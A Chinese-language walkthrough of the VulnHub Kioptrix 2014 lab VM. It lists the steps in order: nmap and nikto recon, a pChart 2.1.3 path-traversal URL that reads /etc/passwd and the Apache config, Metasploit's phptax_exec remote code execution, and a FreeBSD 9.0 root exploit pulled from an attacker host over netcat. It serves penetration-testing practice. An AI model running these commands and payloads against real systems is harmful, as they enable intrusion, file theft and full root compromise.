貓寧~~~
地址:http://www.vulnhub.com/entry/kioptrix-2014-5,62/
重點關注工具使用和測試思路,測試中發現VM鏡像導入虛擬機後,nmap找不到IP,作者在描述中提供有解決方案。
nmap 192.168.43.0/24
靶機IP 192.168.43.186
nmap -A -p1-65535 192.168.43.186
80/tcp open http
8080/tcp open http
訪問http://192.168.43.186/,http://192.168.43.186:8080/
查看http://192.168.43.186/源代碼,發現隱藏路徑pChart2.1.3/index.php
dirb http://192.168.43.186/
nikto -h http://192.168.43.186/
獲知Apache/2.2.21(FreeBSD)
攻擊payload,https://www.exploit-db.com/exploits/31173
http://192.168.43.186/pChart2.1.3/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
apache配置文件路徑
https://cwiki.apache.org/confluence/display/HTTPD/DistrosDefaultLayout#DistrosDefaultLayout-FreeBSD6.1%28Apachehttpd2.2%29:
http://192.168.43.186/pChart2.1.3/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf
firefox安裝User-Agent Switcher and Manager插件,替換UA爲Mozilla/4.0
訪問http://192.168.43.186:8080,獲知phptax目錄
phptax遠程命令執行payload,借用Metasploit
https://www.exploit-db.com/exploits/21833
進入msfconsole
search phptax
use exploit/multi/http/phptax_exec
show options
set RHOST 192.168.43.186
set RPORT 8080
run
python -c 'import pty; pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
uname -a
FreeBSD 9.0提權
https://www.exploit-db.com/exploits/28718
在攻擊機上nc -lvnp 6666 < tiquan.c
靶機下載文件
cd /tmp
nc -nv 192.168.43.154 6666 > tiquan.c
gcc tiquan.c
./a.out執行,獲取root權限